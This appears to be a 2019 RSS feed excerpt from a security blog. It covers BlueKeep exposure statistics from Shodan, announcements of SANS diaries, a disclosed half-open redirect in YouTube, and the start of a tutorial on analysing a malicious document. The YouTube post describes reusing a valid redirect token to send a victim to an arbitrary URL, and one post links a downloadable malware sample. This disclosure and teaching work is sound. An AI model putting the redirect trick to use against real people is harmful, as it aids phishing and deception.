&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>SPF</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>ALEF Security Report 2019</title>
        <link>https://untrustednetwork.net/en/2019/09/16/alef-security-report-2019/</link>
        <pubDate>Mon, 16 Sep 2019 20:40:35 +0200</pubDate>
        
        <atom:modified>Mon, 16 Sep 2019 20:40:35 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/09/16/alef-security-report-2019/</guid>
        <description>Couple of months back, my colleagues and I created a report covering current cyber security situation in the Czech Republic. If you&amp;rsquo;d like to know, what security services were most in demand during the last couple of years, how large is the percentage of Czech organizations, which conduct phishing tests of their employees, or how STARTTLS adoption is progressing in Czech Republic, you may download it here.</description>
        <content:encoded>&lt;p&gt;Couple of months back, my colleagues and I created a report covering current cyber security situation in the Czech Republic. If you&amp;rsquo;d like to know, what security services were most in demand during the last couple of years, how large is the percentage of Czech organizations, which conduct phishing tests of their employees, or how STARTTLS adoption is progressing in Czech Republic, you may download it &lt;a href=&#34;https://untrustednetwork.net/files/2019/ALEF_Security_Report_2019_EN.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>ALEF</category>
            
          
            
              <category>ALEF CSIRT</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Tricky LNK points to TrickBot</title>
        <link>https://untrustednetwork.net/en/2019/09/03/sans-isc-diary-tricky-lnk-points-to-trickbot/</link>
        <pubDate>Tue, 03 Sep 2019 13:06:21 +0200</pubDate>
        
        <atom:modified>Tue, 03 Sep 2019 13:06:21 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/09/03/sans-isc-diary-tricky-lnk-points-to-trickbot/</guid>
        <description>A Guest Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at analyzing a malicious LNK file which leads us to a sample of Trickbot.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Guest+Diary+Tricky+LNK+points+to+TrickBot/25290/&#34;&gt;Guest Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at analyzing a malicious LNK file which leads us to a sample of Trickbot.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Malware Analysis</category>
            
          
            
              <category>Trickbot</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Open Redirect: A Small But Very Common Vulnerability</title>
        <link>https://untrustednetwork.net/en/2019/08/28/sans-isc-diary-open-redirect-a-small-but-very-common-vulnerability/</link>
        <pubDate>Wed, 28 Aug 2019 14:27:02 +0200</pubDate>
        
        <atom:modified>Wed, 28 Aug 2019 14:27:02 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/08/28/sans-isc-diary-open-redirect-a-small-but-very-common-vulnerability/</guid>
        <description>A Guest Diary of mine was published today on the SANS Internet Storm Center. In this one, I discuss open redirect vulnerabilities and how to find them. If you&amp;rsquo;ve never heard of open redirects, this might be a useful introductory text.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Guest+Diary+Open+Redirect+A+Small+But+Very+Common+Vulnerability/25276/&#34;&gt;Guest Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, I discuss open redirect vulnerabilities and how to find them. If you&amp;rsquo;ve never heard of open redirects, this might be a useful introductory text.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Where are all the machines affected by BlueKeep hiding - part 2</title>
        <link>https://untrustednetwork.net/en/2019/08/10/where-are-all-the-machines-affected-by-bluekeep-hiding-part-2/</link>
        <pubDate>Sat, 10 Aug 2019 10:11:50 +0200</pubDate>
        
        <atom:modified>Sat, 10 Aug 2019 10:11:50 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/08/10/where-are-all-the-machines-affected-by-bluekeep-hiding-part-2/</guid>
        <description>Last week, we took a look at Shodan results to try to determine which countries are the &amp;ldquo;richest&amp;rdquo; in the world when it comes to machines vulnerable to BlueKeep visible from the internet. Since the number of vulnerable machines Shodan detects grows every day (see the following chart), I thought it might be interesting to have another look at the numbers. But in a way which is a little different.</description>
        <content:encoded>&lt;p&gt;Last week, we &lt;a href=&#34;https://untrustednetwork.net/en/2019/08/01/where-are-all-the-machines-affected-by-bluekeep-hiding/&#34;&gt;took a look at Shodan results&lt;/a&gt; to try to determine which countries are the &amp;ldquo;richest&amp;rdquo; in the world when it comes to machines vulnerable to BlueKeep visible from the internet. Since the number of vulnerable machines Shodan detects grows every day (see the following chart), I thought it might be interesting to have another look at the numbers. But in a way which is a little different.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/bluekeep-global.png&#34; alt=&#34;BlueKeep detections by Shodan&#34; /&gt;&lt;/p&gt;
&lt;p&gt;It should be mentioned that the rise in the number of affected machines is most likely due to Shodan scanning previously unscanned IP ranges and not because there are actually more vulnerable machines out there. In fact it is quite probable that a not insignificant percentage of machines shown by Shodan as vulnerable have either been assigned different IP addresses since the detection (and could therefore have even been counted multiple times) of have been patched since the detection. If you&amp;rsquo;d like to see something closer to an actual &amp;ldquo;real-time&amp;rdquo; look at the number of machines which are still vulnerable to BlueKeep and accessible from the internet, &lt;a href=&#34;https://rdpscan.shadowserver.org/statsbluekeep/&#34;&gt;Shadowserver&lt;/a&gt; will probably be a better place to look then Shodan.&lt;br /&gt;
But that doesn&amp;rsquo;t mean that Shodan can&amp;rsquo;t still give us something quite interesting in this area.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;br /&gt;
Since very little has changed in terms of positions of different countries (see the &lt;a href=&#34;https://untrustednetwork.net/en/2019/08/01/where-are-all-the-machines-affected-by-bluekeep-hiding/&#34;&gt;previous post&lt;/a&gt; if you are interested who still has the dubious honor of belonging to the &amp;ldquo;BlueKeep Top 10 Club of Countries&amp;rdquo; as there were no changes in the first 10 places), I believe it might be more interesting to explore another aspect of the numbers, namely what percentage of machines which are accessible on the usual RDP ports (3388 and 3389) in the different countries are actually vulnerable. I quite like the idea since it could give us at least some idea of how large a percentage of all affected machines are potentially still unpatched in the countries in question.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;br /&gt;
It is true that machines directly accessible from the internet are not the best sample for &amp;ldquo;all the machines out there&amp;rdquo;, however some lose correlation between patch levels of servers accessible from the internet and patch levels of all the other machines certainly exists. One could even realistically expect that servers directly connected to the internet should be patched more often than other servers/machines so using what Shodan sees as a sample isn&amp;rsquo;t that inappropriate.&lt;br /&gt;
Although, since we&amp;rsquo;re listing weaknesses of this approach, we should mention that we&amp;rsquo;re completely skipping over identifying operating systems of machines behind the RDP ports and we&amp;rsquo;re counting anything with any service accessible on 3388 or 3389 as either vulnerable or patched. I.e. the following results are interesting but take them with a grain of salt.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;br /&gt;
Based on Shodan detections, of the 30 countries with highest numbers of affected machines, Hong Kong, South Korea, Argentina, China and Ukraine seem to be worse off when it comes to the percentages of machines with open RDP ports that are vulnerable to BlueKeep.&lt;br /&gt;
I&amp;rsquo;ve left the chart ordered by number of detected vulnerable machines in different countries so you can draw your own conclusions. The percentages themselves are in a table at the end of the post.&lt;br /&gt;
What seems most interesting is that although the US is second overall in the number of vulnerable machines detected (over 109k machines on the day of writing), it appears that the local patching culture is much better than in the rest of the &amp;ldquo;Top 30&amp;rdquo; BlueKeep countries as this number represents less than 3.7% of all systems with open RDP ports in the US.&lt;br /&gt;
This well illustrates the fact number of vulnerable systems in a certain country often doesn&amp;rsquo;t give us the whole story&amp;hellip;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/bluekeep-percentages.png&#34; alt=&#34;Percentage of machines with open RDP ports affected by BlueKeep &#34; /&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Position&lt;/th&gt;
&lt;th&gt;Country&lt;/th&gt;
&lt;th&gt;Vulnerable machines&lt;/th&gt;
&lt;th&gt;Percentage of vulnerable machines&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;China&lt;/td&gt;
&lt;td&gt;355449&lt;/td&gt;
&lt;td&gt;24.34%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;United States&lt;/td&gt;
&lt;td&gt;109011&lt;/td&gt;
&lt;td&gt;3.67%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;South Korea&lt;/td&gt;
&lt;td&gt;32300&lt;/td&gt;
&lt;td&gt;29.07%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Brazil&lt;/td&gt;
&lt;td&gt;29137&lt;/td&gt;
&lt;td&gt;19.66%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Russian Federation&lt;/td&gt;
&lt;td&gt;28432&lt;/td&gt;
&lt;td&gt;20.12%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Hong Kong&lt;/td&gt;
&lt;td&gt;25015&lt;/td&gt;
&lt;td&gt;30.67%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Germany&lt;/td&gt;
&lt;td&gt;13971&lt;/td&gt;
&lt;td&gt;6.58%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Taiwan&lt;/td&gt;
&lt;td&gt;13394&lt;/td&gt;
&lt;td&gt;22.36%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Japan&lt;/td&gt;
&lt;td&gt;12444&lt;/td&gt;
&lt;td&gt;10.15%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;United Kingdom&lt;/td&gt;
&lt;td&gt;11691&lt;/td&gt;
&lt;td&gt;8.75%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;France&lt;/td&gt;
&lt;td&gt;10413&lt;/td&gt;
&lt;td&gt;7.74%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Canada&lt;/td&gt;
&lt;td&gt;10086&lt;/td&gt;
&lt;td&gt;9.78%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Italy&lt;/td&gt;
&lt;td&gt;9585&lt;/td&gt;
&lt;td&gt;16.99%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Spain&lt;/td&gt;
&lt;td&gt;9428&lt;/td&gt;
&lt;td&gt;17.13%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;India&lt;/td&gt;
&lt;td&gt;7732&lt;/td&gt;
&lt;td&gt;11.00%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Mexico&lt;/td&gt;
&lt;td&gt;7361&lt;/td&gt;
&lt;td&gt;16.50%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;Netherlands&lt;/td&gt;
&lt;td&gt;6941&lt;/td&gt;
&lt;td&gt;4.48%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;Argentina&lt;/td&gt;
&lt;td&gt;6826&lt;/td&gt;
&lt;td&gt;27.86%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;Ukraine&lt;/td&gt;
&lt;td&gt;6516&lt;/td&gt;
&lt;td&gt;22.41%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;Australia&lt;/td&gt;
&lt;td&gt;5555&lt;/td&gt;
&lt;td&gt;8.69%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;td&gt;Viet Nam&lt;/td&gt;
&lt;td&gt;5455&lt;/td&gt;
&lt;td&gt;13.07%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;Singapore&lt;/td&gt;
&lt;td&gt;5226&lt;/td&gt;
&lt;td&gt;6.45%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23&lt;/td&gt;
&lt;td&gt;Turkey&lt;/td&gt;
&lt;td&gt;4915&lt;/td&gt;
&lt;td&gt;10.92%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;24&lt;/td&gt;
&lt;td&gt;Thailand&lt;/td&gt;
&lt;td&gt;4522&lt;/td&gt;
&lt;td&gt;15.52%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;25&lt;/td&gt;
&lt;td&gt;Poland&lt;/td&gt;
&lt;td&gt;4241&lt;/td&gt;
&lt;td&gt;14.01%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;26&lt;/td&gt;
&lt;td&gt;South Africa&lt;/td&gt;
&lt;td&gt;4175&lt;/td&gt;
&lt;td&gt;13.95%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;td&gt;Colombia&lt;/td&gt;
&lt;td&gt;2962&lt;/td&gt;
&lt;td&gt;14.59%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;28&lt;/td&gt;
&lt;td&gt;Czech Republic&lt;/td&gt;
&lt;td&gt;2890&lt;/td&gt;
&lt;td&gt;10.40%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;29&lt;/td&gt;
&lt;td&gt;Iran&lt;/td&gt;
&lt;td&gt;2822&lt;/td&gt;
&lt;td&gt;14.14%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;30&lt;/td&gt;
&lt;td&gt;Malaysia&lt;/td&gt;
&lt;td&gt;2725&lt;/td&gt;
&lt;td&gt;17.82%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/stats.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>BlueKeep</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - The good, the bad and the non-functional</title>
        <link>https://untrustednetwork.net/en/2019/08/08/sans-isc-diary-the-good-the-bad-and-the-non-functional/</link>
        <pubDate>Thu, 08 Aug 2019 21:31:08 +0200</pubDate>
        
        <atom:modified>Thu, 08 Aug 2019 21:31:08 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/08/08/sans-isc-diary-the-good-the-bad-and-the-non-functional/</guid>
        <description>A Guest Diary of mine was published today on the SANS Internet Storm Center. If you&amp;rsquo;ve wondered how do the less usual cyber attacks look, it might be worth a read&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Guest+Diary+The+good+the+bad+and+the+nonfunctional+or+how+not+to+do+an+attack+campaign/25218/&#34;&gt;Guest Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. If you&amp;rsquo;ve wondered how do the less usual cyber attacks look, it might be worth a read&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Attack</category>
            
          
            
              <category>SANS</category>
            
          
            
              <category>Drupal</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Where are all the machines affected by BlueKeep hiding?</title>
        <link>https://untrustednetwork.net/en/2019/08/01/where-are-all-the-machines-affected-by-bluekeep-hiding/</link>
        <pubDate>Thu, 01 Aug 2019 11:23:55 +0200</pubDate>
        
        <atom:modified>Mon, 05 Aug 2019 16:13:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/08/01/where-are-all-the-machines-affected-by-bluekeep-hiding/</guid>
        <description>EDIT 8/5/2019: Wrong CVE - CVE-2019-0709 was mentioned instead of CVE-2019-0708&amp;hellip;
We&amp;rsquo;ve all read about the hundereds of thousands of machines affected by BlueKeep connected to the internet, but where are they hiding? With the help of Shodan, we can try to figure it out.
At the time of writing, Shodan returns 667243 results for CVE-2019-0708. In the leading place is China with 291686 results, followed by United States (88625 results), Korea (26578 results), Brazil (23756 results) and Russia (22682).</description>
        <content:encoded>&lt;p&gt;&lt;em&gt;EDIT 8/5/2019: Wrong CVE - CVE-2019-0709 was mentioned instead of CVE-2019-0708&amp;hellip;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ve all read about the hundereds of thousands of machines affected by BlueKeep connected to the internet, but where are they hiding? With the help of Shodan, we can try to figure it out.&lt;/p&gt;
&lt;p&gt;At the time of writing, Shodan returns 667243 results for CVE-2019-0708. In the leading place is China with 291686 results, followed by United States (88625 results), Korea (26578 results), Brazil (23756 results) and Russia (22682).&lt;/p&gt;
&lt;p&gt;Top 49 countries are each the home of more than 1000 vulnerable servers (the Czech Republic has 2327 results and is in 29th place) and each of the top 97 countries has at least 100 detections.&lt;/p&gt;
&lt;p&gt;For those of you who would like to take a look at all the countries (though it is possible I missed some of them) where there was at least one vulnerable machine, you may take a look at the following chart.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/bluekeep.png&#34; alt=&#34;BlueKeep&#34; /&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/stats.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>BlueKeep</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>Half-open redirect vulnerability in Youtube</title>
        <link>https://untrustednetwork.net/en/2019/07/22/half-open-redirect-vulnerability-in-youtube/</link>
        <pubDate>Mon, 22 Jul 2019 19:33:43 +0200</pubDate>
        
        <atom:modified>Mon, 22 Jul 2019 19:33:43 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/07/22/half-open-redirect-vulnerability-in-youtube/</guid>
        <description>If you open any Youtube video, which has in its description a link to an external URL, you may notice that the link points to a Youtube redirection mechanism (https://www.youtube.com/redirect?&amp;hellip;), with the target URL being passed to it as a parameter, rather than to the target URL itself. In such a case, the link has the following structure:
https://www.youtube.com/redirect?q=[target_URL]&amp;amp;redir_token=[token]&amp;amp;event=video_description&amp;amp;v=[video_ID]
Since there is a redir_token parameter in the URL, one might assume that the redirect mechanism isn&amp;rsquo;t open, i.</description>
        <content:encoded>&lt;p&gt;If you open any Youtube video, which has in its description a link to an external URL, you may notice that the link points to a Youtube redirection mechanism (ht&lt;span&gt;tps://www.yout&lt;/span&gt;ube.com/redirect?&amp;hellip;), with the target URL being passed to it as a parameter, rather than to the target URL itself. In such a case, the link has the following structure:&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tps://www.you&lt;/span&gt;tube.com/redirect?q=[target_URL]&amp;amp;redir_token=[token]&amp;amp;event=video_description&amp;amp;v=[video_ID]&lt;/p&gt;
&lt;p&gt;Since there is a &lt;em&gt;redir_token&lt;/em&gt; parameter in the URL, one might assume that the redirect mechanism isn&amp;rsquo;t open, i.e. that can&amp;rsquo;t be used for redirection to an arbitrary URL. One would, however, be only half-right.&lt;/p&gt;
&lt;p&gt;The value of the token seems to be connected with the current Youtube session (though there isn&amp;rsquo;t any obvious corelation between values of relevant cookies and the token). And while parameters &lt;em&gt;event&lt;/em&gt; and &lt;em&gt;v&lt;/em&gt; are optional, if you try to use the redirection mechanism without the &lt;em&gt;redir_token&lt;/em&gt; parameter - or with an invalid value of this parameter - you will be greeted with the following message:&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/youtube/are_you_sure.png&#34; alt=&#34;Are you sure?&#34; /&gt;&lt;/p&gt;
&lt;p&gt;You may try this out for yourself yourself using this &lt;a href=&#34;https://www.youtube.com/redirect?q=https%3A%2F%2Fwww.untrustednetwork.net&#34;&gt;link&lt;/a&gt;. So far everything seems to be in order.&lt;/p&gt;
&lt;p&gt;A problem - if only a small one - however, starts to become obvious when we try to use a valid token along with another URL (i.e. we copy a valid link, perhaps delete the optional parameters, and change the value of the parameter &lt;em&gt;q&lt;/em&gt;). In this case, a browser will indeed be redirected (using HTTP code 303) to the new URL, because the tokens are in no way dependent on the value of &lt;em&gt;q&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This means that if you can get a valid redirect link from a user, who has an active Youtube session established, you could modify it in such a way, that - if this user opened it - it would redirect his/her browser to the URL of your choice. As the tokens seem to last (although I tried to determine the maximum age for a token on only one ocasion so don&amp;rsquo;t quote me on it) for approximately 24 hours, one could hypotetically use this (it should probably be called &amp;ldquo;partially-missing input validation&amp;rdquo;, but &amp;ldquo;half-open redirect&amp;rdquo; will do) vulnerability in a real world scenario. Although it is almost completely useless for malicious phishing campaigns, it could be used quite effectively against - for example - one&amp;rsquo;s coleagues and/or friends (e.g. &amp;ldquo;Jack, could you please send me the link under this video? Thank you. Now, here is a link to a video you&amp;rsquo;re going to love&amp;hellip;&amp;quot;). Plus, it might be a good example of dangers of clicking on seemingly safe links in e-mail for any security awareness classes out there.&lt;/p&gt;
&lt;p&gt;Since Google replied to me that they don&amp;rsquo;t intend to fix this small vulnerability and don&amp;rsquo;t mind if I publish it, use it (&lt;strong&gt;ethically&lt;/strong&gt;, please) as you see fit.&lt;/p&gt;
&lt;p&gt;It should be added that there seems to be some regularity to the values of tokens being generated (e.g. when a site is refreshed), but at first glance there doesn&amp;rsquo;t seem to be any obvious way to use this regularity to craft valid tokens, although I didn&amp;rsquo;t spend much time on verifying that.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>Youtube</category>
            
          
            
              <category>Google</category>
            
          
        
        
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>Analysis of an encrypted malicious DOC file and an (un)interesting phishing</title>
        <link>https://untrustednetwork.net/en/2019/05/05/analysis-of-an-encrypted-malicious-doc-file-and-an-uninteresting-phishing/</link>
        <pubDate>Sun, 05 May 2019 18:02:46 +0200</pubDate>
        
        <atom:modified>Sun, 05 May 2019 18:02:46 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/05/05/analysis-of-an-encrypted-malicious-doc-file-and-an-uninteresting-phishing/</guid>
        <description>Couple of days ago, I found a pretty usual-looking phishing e-mail in one of the quarantine folders of my inbox. It was addressed to me and to 19 other security specialists and incident response teams and contained a text (in German - see bellow), informing us that the author saw a job offer to which she was responding with an application document attached to the e-mail. The attachment appeared to be an encrypted DOC file and the password (&amp;ldquo;123123&amp;rdquo;) was mentioned in the body of the message.</description>
        <content:encoded>&lt;p&gt;Couple of days ago, I found a pretty usual-looking phishing e-mail in one of the quarantine folders of my inbox. It was addressed to me and to 19 other security specialists and incident response teams and contained a text (in German - see bellow), informing us that the author saw a job offer to which she was responding with an application document attached to the e-mail. The attachment appeared to be an encrypted DOC file and the password (&amp;ldquo;123123&amp;rdquo;) was mentioned in the body of the message.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sehr geehrte Damen und Herren,

über die Webseite der Bundesagentur für Arbeit habe ich von Ihrem Stellenangebot erfahren.
Aufgrund meiner langjährigen Berufserfahrung und die kontinuierliche, selbständige Weiterbildung bin ich mir sich, die mit der herausfordernden Stelle verbundenen Anforderungen zu Ihrer Zufriedenheit erfüllen zu können.

Meine Bewerbungsunterlagen habe ich an diese E-Mail angehängt. Passwort: 123123

Ich verfolge das Ziel, alle meine Fertigkeiten gewinnbringend in Ihrem Unternehmen einzusetzenDarüber hinaus strebe ich eine kontinuierliche Weiterentwicklung an, um auch zukünftige Anforderungen an diese Stelle erfüllen zu können.

Gerne stehe ich Ihnen für weitere Fragen zur Verfügung. Auf eine persönliches Vorstellungsgespräch, in welchem ich Sie gerne von meinen fachlichen Kenntnissen sowie meiner Motivation überzeuge, freue ich mich.

Ich verbleibe mit freundlichen Grüßen
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Even though pretty much the only unussual thing about the e-mail were the recipients, I&amp;rsquo;ve decided to do a short writeup on it since I&amp;rsquo;ve often seen junior (although not only) analysts struggle with analyzing potetially malicious Office files and I believe that this might be a good case to learn at least some basics on. So if you&amp;rsquo;ve never done &amp;ldquo;maldoc analysis&amp;rdquo; and want to know the basics, consider this a quick-and-dirty tutorial to get you up to speed.&lt;/p&gt;
&lt;p&gt;You may download the document in question &lt;a href=&#34;https://untrustednetwork.net/files/2019/maldoc-4-2019.zip&#34;&gt;here&lt;/a&gt; (password is &amp;ldquo;infected&amp;rdquo;) and follow along, if you&amp;rsquo;d like.&lt;/p&gt;
&lt;p&gt;To my mind, the best tool - or rather a collection of tools - for analyzing Office documents and PDFs (among other file types) and determining whether or not they&amp;rsquo;re malicious is the &lt;a href=&#34;https://blog.didierstevens.com/didier-stevens-suite/&#34;&gt;Didier Stevens Suite&lt;/a&gt; (DSS). The tool from this suite which can help us the most when it comes to analyzing &amp;ldquo;old style&amp;rdquo; Office documents (DOC, XLS and some other file types) is &lt;a href=&#34;https://blog.didierstevens.com/programs/oledump-py/&#34;&gt;OLEdump&lt;/a&gt;. Use of the tool is quite straightforward and it can provide us with lots of analytical information about a potentially malicious file. If we run it against the document without any additional parameters, it will give us some basic information about internal structure of the file.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/maldoc/oledump_output.png&#34; alt=&#34;OLEdump output&#34; /&gt;&lt;/p&gt;
&lt;p&gt;In this case, it seems that the files contents are indeed encrypted, but this isn&amp;rsquo;t quite what one would expect to see when analyzing a &amp;ldquo;normal&amp;rdquo; password-protected DOC file as the internal file structure displayed doesn&amp;rsquo;t look right.&lt;/p&gt;
